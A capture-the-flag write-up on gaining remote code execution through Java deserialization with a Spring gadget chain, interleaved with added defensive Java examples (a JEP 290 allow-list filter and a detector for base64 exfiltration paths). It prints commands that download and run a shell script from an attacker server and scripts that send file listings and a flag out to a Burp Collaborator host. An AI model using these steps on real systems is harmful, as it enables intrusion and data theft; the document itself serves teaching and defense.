Tags: spring java-serialization rce java 

# ▼▼▼TOO_MANY_CREDITS_2(Web:432pts,71/661=10.7%)▼▼▼

This writeup is written by [**@kazkiti_ctf**](https://twitter.com/kazkiti_ctf)

---

## 【Aim for RCE with Java serialization】

Using the BurpSuite extension **Java Deserialization Scanner**

(Reference) `https://portswigger.net/bappstore/228336544ebe4e68824b5146dbbd93ae`

It turns out the serialized object is exploitable with the `Spring` gadget chain.
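The finding above (an application that deserializes attacker-supplied Java objects with Spring on the classpath) is fixed on the defending side by refusing to deserialize anything not on an explicit allow-list. The following is an added example, not code from the writeup or from the challenge, showing the JDK's built-in `ObjectInputFilter` (JEP 290, Java 9+) doing exactly that: a stream carrying the expected `Ping` class is accepted, and a stream carrying any other class, which is what a gadget chain consists of, is rejected before its `readObject` ever runs. The class names `Ping` and `Unexpected` are hypothetical stand-ins.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InvalidClassException;
import java.io.ObjectInputFilter;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.Serializable;

// Added example (not from the writeup): allow-list deserialization with JEP 290.
public class DeserializationFilterDemo {

    // The one application type we expect on the wire (hypothetical).
    public static final class Ping implements Serializable {
        private static final long serialVersionUID = 1L;
        final int seq;
        Ping(int seq) { this.seq = seq; }
    }

    // Stand-in for "any class the application did not expect", which is what a
    // gadget chain is made of. It is deliberately benign; only its name matters.
    public static final class Unexpected implements Serializable {
        private static final long serialVersionUID = 1L;
    }

    static byte[] serialize(Object o) throws IOException {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream oos = new ObjectOutputStream(bos)) {
            oos.writeObject(o);
        }
        return bos.toByteArray();
    }

    // Accept only Ping, reject everything else ("!*"), and cap nesting depth and
    // stream size so resource-exhaustion payloads are cut off early as well.
    static final ObjectInputFilter FILTER = ObjectInputFilter.Config.createFilter(
            "maxdepth=5;maxbytes=4096;"
            + DeserializationFilterDemo.class.getName() + "$Ping;!*");

    static Object deserialize(byte[] data) throws IOException, ClassNotFoundException {
        try (ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(data))) {
            ois.setObjectInputFilter(FILTER);
            return ois.readObject();
        }
    }

    public static void main(String[] args) throws Exception {
        Ping ok = (Ping) deserialize(serialize(new Ping(42)));
        System.out.println("allowed: Ping seq=" + ok.seq);

        try {
            deserialize(serialize(new Unexpected()));
            System.out.println("BUG: unexpected class was accepted");
        } catch (InvalidClassException e) {
            // The filter rejects the class descriptor, so no constructor,
            // readObject or gadget code of the rejected class is executed.
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

The same allow-list can be applied process-wide with `-Djdk.serialFilter=...` instead of per stream; the per-stream form is shown because it makes the accepted set visible next to the code that reads the stream.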

---

## 【Trial and error】

Exploit `Spring` with the BurpSuite extension. Legend: ○ callback received as intended, × no callback, △ callback received but the shell syntax arrives literally.

```
○Spring2 "wget http://x97ckfooqryax6z8mpno9n9ryi4es3.burpcollaborator.net"         ⇒GET /
×Spring2 "wget http://x97ckfooqryax6z8mpno9n9ryi4es3.burpcollaborator.net --user-agent test" ⇒ No access
△Spring2 "wget http://x97ckfooqryax6z8mpno9n9ryi4es3.burpcollaborator.net/`echo 'test'`"    ⇒GET /`echo
△Spring2 "wget http://x97ckfooqryax6z8mpno9n9ryi4es3.burpcollaborator.net/`echo test`"    ⇒GET /`echo
△Spring2 "wget http://x97ckfooqryax6z8mpno9n9ryi4es3.burpcollaborator.net/`id`"       ⇒GET /`id`
  ※ Backquotes are passed as literal characters
△Spring2 "wget http://x97ckfooqryax6z8mpno9n9ryi4es3.burpcollaborator.net/$(id)"      ⇒GET /$(id)
  ※ $(id) is passed as literal characters
△Spring2 "wget http://x97ckfooqryax6z8mpno9n9ryi4es3.burpcollaborator.net/|id"       ⇒GET /|id
  ※ | is passed as a literal character
×Spring2 "sleep 10;wget http://x97ckfooqryax6z8mpno9n9ryi4es3.burpcollaborator.net/sleep"   ⇒ No access
△Spring2 "wget http://x97ckfooqryax6z8mpno9n9ryi4es3.burpcollaborator.net/sleep;sleep 10"   ⇒GET /sleep;sleep
  ※ ; is passed as a literal character. The argument is cut at the first `space`.
```

Shell metacharacters (backquotes, `$( )`, `|`, `;`) are passed through literally and the command is split on spaces, so shell operators cannot be used directly. This is consistent with the command being handed to `Runtime.exec(String)`, which tokenizes on whitespace and runs the program directly, with no shell in between to interpret those characters.

---

## 【Finally】

Finally, I put a shell script on the server and executed it

```
○Spring2 "wget -P /tmp/ http://my_server/kaz.sh"
○Spring2 "sh /tmp/kaz.sh"
```

---

## 【exploit】

Create **the following file**, host it on **my_server**, and note that the target's `/tmp/` folder is writable

kaz5.sh
```
#!/bin/bash
wget http://ih3xs0w9yc6v5r7tuav9h8hc63c20r.burpcollaborator.net/`ls|base64`
```

Download the file with wget into the target's `/tmp/` folder
```
Spring2 "wget -P /tmp/ http://my_server/kaz5.sh"
```

---

Execute the file
```
Spring2 "sh /tmp/kaz5.sh"
```

↓ The request arrives at my_server

```
GET /YmluCmZsYWcudHh0CmxpYgo= HTTP/1.1
Host: ih3xs0w9yc6v5r7tuav9h8hc63c20r.burpcollaborator.net
```

`YmluCmZsYWcudHh0CmxpYgo=`

↓ base64 decode

```
bin
flag.txt
lib
```

---

## 【Get flag】

kaz10.sh
```
#!/bin/bash
wget http://ih3xs0w9yc6v5r7tuav9h8hc63c20r.burpcollaborator.net/`cat flag.txt|base64`
```

```
Spring2 "wget -P /tmp/ http://my_server/kaz10.sh"
Spring2 "sh /tmp/kaz10.sh"
```

↓ The request arrives at my_server

```
GET /Z2lnZW17ZGEkaF8zXzFzX0FfbDFmM3NlTmR9Cg== HTTP/1.1
Host: ih3xs0w9yc6v5r7tuav9h8hc63c20r.burpcollaborator.net
```

`Z2lnZW17ZGEkaF8zXzFzX0FfbDFmM3NlTmR9Cg==`

↓ base64 decode

`gigem{da$h_3_1s_A_l1f3seNd}`
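Both callbacks above (the directory listing and the flag) leave the same trace on the receiving side: a single request whose entire path is a base64 blob. A defender watching an outbound proxy or web server log can flag that shape directly. The following is an added example, not part of the writeup, of such a detector: it parses common-log-format request lines (a hypothetical format choice; Burp Collaborator's own log looks different), picks out paths that consist only of a long, correctly padded base64 segment, and decodes them when the result is printable text. The sample log lines are constructed for the example and reuse the two encoded values shown above.

```java
import java.nio.charset.StandardCharsets;
import java.util.ArrayList;
import java.util.Base64;
import java.util.List;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

// Added example (not from the writeup): flag base64-only request paths, the
// shape of the exfiltration callbacks shown above, and decode them for review.
public class Base64PathExfilDetector {

    // Common-log-format request line: "GET /path?query HTTP/1.1" (query ignored).
    private static final Pattern REQUEST_LINE =
            Pattern.compile("\"(?:GET|POST|HEAD) /([^ ?]*)(?:\\?[^ ]*)? HTTP/[0-9.]+\"");

    // Standard base64 alphabet, optional padding, at least 16 characters;
    // shorter segments are too often ordinary path names.
    private static final Pattern B64_SEGMENT =
            Pattern.compile("^[A-Za-z0-9+/]{16,}={0,2}$");

    public static final class Hit {
        public final String path;
        public final String decoded;
        Hit(String path, String decoded) { this.path = path; this.decoded = decoded; }
    }

    /** Returns the decoded text if the segment is well-formed base64 of printable ASCII, else null. */
    static String decodeIfBase64(String segment) {
        if (!B64_SEGMENT.matcher(segment).matches() || segment.length() % 4 != 0) {
            return null;
        }
        byte[] raw;
        try {
            raw = Base64.getDecoder().decode(segment);
        } catch (IllegalArgumentException e) {
            return null;
        }
        // Exfiltrated listings and file contents are printable text; random
        // base64-looking tokens (session ids, CDN hashes) usually are not.
        for (byte b : raw) {
            if (b != '\n' && b != '\r' && b != '\t' && (b < 0x20 || b > 0x7e)) {
                return null;
            }
        }
        return new String(raw, StandardCharsets.US_ASCII);
    }

    /** Scans log lines and returns every request whose path decodes as base64 text. */
    static List<Hit> scan(List<String> logLines) {
        List<Hit> hits = new ArrayList<>();
        for (String line : logLines) {
            Matcher m = REQUEST_LINE.matcher(line);
            if (!m.find()) continue;
            String decoded = decodeIfBase64(m.group(1));
            if (decoded != null) hits.add(new Hit(m.group(1), decoded));
        }
        return hits;
    }

    public static void main(String[] args) {
        // Constructed sample lines modelled on the callbacks in the writeup.
        List<String> sample = List.of(
            "10.0.0.5 - - [01/Jan/2020:00:00:01 +0000] \"GET / HTTP/1.1\" 200 12",
            "10.0.0.5 - - [01/Jan/2020:00:00:02 +0000] \"GET /YmluCmZsYWcudHh0CmxpYgo= HTTP/1.1\" 404 0",
            "10.0.0.5 - - [01/Jan/2020:00:00:03 +0000] \"GET /static/app.js HTTP/1.1\" 200 5120",
            "10.0.0.5 - - [01/Jan/2020:00:00:04 +0000] \"GET /Z2lnZW17ZGEkaF8zXzFzX0FfbDFmM3NlTmR9Cg== HTTP/1.1\" 404 0");
        for (Hit h : scan(sample)) {
            System.out.println(h.path + " -> " + h.decoded.replace("\n", "\\n"));
        }
    }
}
```

Run against the sample, the detector reports the two base64 paths and decodes them to `bin\nflag.txt\nlib\n` and `gigem{da$h_3_1s_A_l1f3seNd}\n`, while `/` and `/static/app.js` are ignored. In a real deployment the printable-text check is what keeps the false-positive rate tolerable; lowering the minimum length or dropping the padding check will start matching CDN asset hashes and session tokens.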